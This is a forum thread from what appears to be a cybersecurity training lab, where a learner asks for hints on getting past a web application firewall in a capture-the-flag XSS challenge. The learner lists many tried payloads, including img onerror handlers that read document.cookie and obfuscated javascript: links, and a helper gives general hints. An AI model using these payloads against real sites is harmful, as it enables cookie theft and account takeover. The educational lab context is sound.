I’m trying to bypass WAF in order to capture the flag. I’ve tested all “Guided Exercise” commands. The word “javascript” is blocked by WAF. I also tried to do something like “jaascrpt” or “ja vascri pt” and got nothing. I was wondering if someone could give me a hint, so I can get to the point!
Thanks in Advance!
Hey there - this isn’t really my area of expertise, but working backwards from the instructor’s solution notes, I’d say you don’t necessarily need to use that javascript directive from Part 4 to get the flag.
Broadly speaking, I would recommend:
Seeing which meta characters and special characters work.
Seeing which basic HTML elements work.
Seeing if any attributes work (i.e. src=, data=)
Reviewing the core concept lesson for additional techniques.
It also help to come to this challenge later. All challenge exercises are optional, and you may benefit from completing additional lab work from other parts of the path first.
I tried several possible approaches (such as character code, using decimal,etc.) to bypass, but none of them worked. I’m just curious what was the solution Cybrary expected me to find out.
You are trying to steal the cookie. One hint I can give is that what may not work in the Guided Exercises might just work in the Challenge.
Please write a list of the things you have tried 
I’ll edit them if I think they give too much away
Here are the list of things I’ve tired so far:
asdf>"'<img src=x>
asdf>"'<img src=x onerror=alert(1234);>
asdf>"'<img src=x onerror=console.log(document.cookie);>
asdf>"'<img src=x onerror=document.write(document.cookie);>
asdf>"'<img src=x onerror=prompt(document.cookie);>
asdf>"'<img src=x onaaaaa= >
asdf>"'<a href="">CLICK</a>
asdf>"'<a href="javascript:aaa">CLICK</a>
asdf>"'<a href="javascript:prompt()">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav�Aascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav ascript:pro mpt(document.cookie)">CLICK</a>
asdf>"'<a href="jav*ascript:pro*mpt(document.cookie)">CLICK</a>
asdf>"'<a href=""jav"+"ascript":prompt(document.cookie)">CLICK</a>
asdf>"'<a href="top["jav"+"ascript]:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="amF2YXNjcmlwdDpwcm9tcHQoZG9jdW1lbnQuY29va2llKQ==">CLICK</a>
and more.
I also tried in the both Guided and Challenge Exersise lab, but nothing changed.
Thanks for your time!
I sent you a private message
I thought I should use the combination of HTML and Javascript codes somehow. I don’t know if it works by the way.
Thank you.